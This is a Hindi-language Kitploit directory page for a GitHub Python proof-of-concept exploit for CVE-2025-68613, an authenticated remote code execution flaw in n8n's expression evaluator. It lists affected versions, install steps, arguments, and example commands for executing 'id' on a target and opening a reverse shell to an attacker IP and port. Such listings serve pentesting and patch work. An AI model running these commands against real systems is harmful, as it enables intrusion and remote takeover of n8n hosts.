Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-68613-Python-Exploit — Python Exploit for CVE-2025-68613. | Kitploit
उपकरण/GitHubGitHub/johanneslks/cve-2025-68613-python-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubjohanneslks/cve-2025-68613-python-exploit

CVE-2025-68613-Python-Exploit

Python Exploit for CVE-2025-68613.

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
16 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-68613: n8n वर्कफ़्लो एक्सप्रेशन RCE

n8n वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म में एक गंभीर दूरस्थ कोड निष्पादन (Remote Code Execution) भेद्यता के लिए प्रूफ़ ऑफ़ कॉन्सेप्ट (PoC) शोषण।


विवरण

यह भेद्यता n8n एक्सप्रेशन मूल्यांकन प्रणाली में मौजूद है। उपयोगकर्ता द्वारा प्रदान किए गए एक्सप्रेशन ठीक से सैंडबॉक्स नहीं किए जाते हैं, जिससे प्रमाणित हमलावर होस्ट सिस्टम पर मनमाना कोड निष्पादित कर सकते हैं।

CVE आईडी: CVE-2025-68613
भेद्यता प्रकार: Remote Code Execution (RCE)
घटक: Expression Evaluator


प्रभावित संस्करण

  • n8n >= 0.211.0
  • n8n < 1.120.4
  • n8n < 1.121.1
  • n8n < 1.122.0

स्थापना

root@kitploit:~
git clone https://github.com/JohannesLks/CVE-2025-68613-Python-Exploit.git
cd CVE-2025-68613-Python-Exploit
pip install -r requirements.txt

उपयोग

सिंटैक्स

root@kitploit:~
python3 n8n_exploit.py -t <TARGET> -u <USER> -p <PASSWORD> [OPTIONS]

तर्क

  • -t, --target : लक्ष्य URL (जैसे, http://localhost:5678)
  • -u, --username : n8n खाता ईमेल पता
  • -p, --password : n8n खाता पासवर्ड
  • -c, --cmd : निष्पादित करने के लिए सिस्टम कमांड
  • --reverse-shell : रिवर्स शेल ट्रिगर करें (प्रारूप: IP PORT)

उदाहरण

भेद्यता जांचें / कमांड निष्पादित करें:

root@kitploit:~
python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" -c "id"

रिवर्स शेल स्थापित करें:

root@kitploit:~
python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" --reverse-shell 192.168.1.100 4444
टूल डाउनलोड करें